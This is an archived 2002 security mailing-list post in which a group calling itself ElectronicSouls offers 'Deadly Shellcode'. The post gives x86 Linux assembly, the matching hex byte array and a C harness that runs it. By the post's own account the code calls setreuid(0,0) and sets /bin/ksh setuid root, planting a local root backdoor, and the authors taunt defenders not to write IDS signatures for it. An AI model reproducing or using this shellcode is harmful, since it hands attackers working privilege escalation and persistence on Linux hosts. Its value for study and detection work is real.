lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200211291731.gATHVaI0054356@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Deadly Shellcode

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Our shellcoding genius has provided us with yet another 0day shellcode.

Please do not make IDS signatures for this,then replay your network
traffic through Snort to catch us!

# cat  chmod-ksh.c
/* (C) Steele [ElectronicSouls]   */

/***************************************
 * xor ebx, ebx                        *
 * mov ecx, ebx                        *
 * mov al, 0x46                        *
 * int 0x80                            *
 *                                     *
 * mov al, 0x0f                        *
 * push ebx                            *
 * push dword 0x68736b2f               *
 * push dword 0x6e69622f               *
 * mov ebx, esp                        *
 * mov cx, 0x9ed                       *
 * int 0x80                            *
 ***************************************
 * since bash has a cold heart         *
 ***************************************
 *                        roc-a-steele *
 ***************************************/

#define DID_YOU_KNOW "that this code does setreuid(0,0)"\
                     "then does chmod("/bin/ksh", 4755);"


unsigned char shellcode[] = "\x31\xdb"
                            "\x89\xd9"
                            "\xb0\x46"
                            "\xcd\x80"
                            "\xb0\x0f"
                            "\x53"
                            "\x68\x2f\x6b\x73\x68"
                            "\x68\x2f\x62\x69\x6e"
                            "\x89\xe3"
                            "\x66\xb9\xed\x09"
                            "\xcd\x80";

int main() {
 /* modified from lamagra's execute chroot shellcode */
  int (*funct)();
  funct = (int (*)()) shellcode;
  printf("size = %d\n",strlen(shellcode));
  (int)(*funct)();

 }

#

The Electronic Souls Crew
[Electronicsouls] (c) 2002

"The game of go is complex."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3npIsMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltzjYAn1S5/lZt5LGK
oh066BNZmnT2AWZpAJ9eg0QVkUWsE3PfCfWpfEMOUzDCLw==
=6TaJ
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ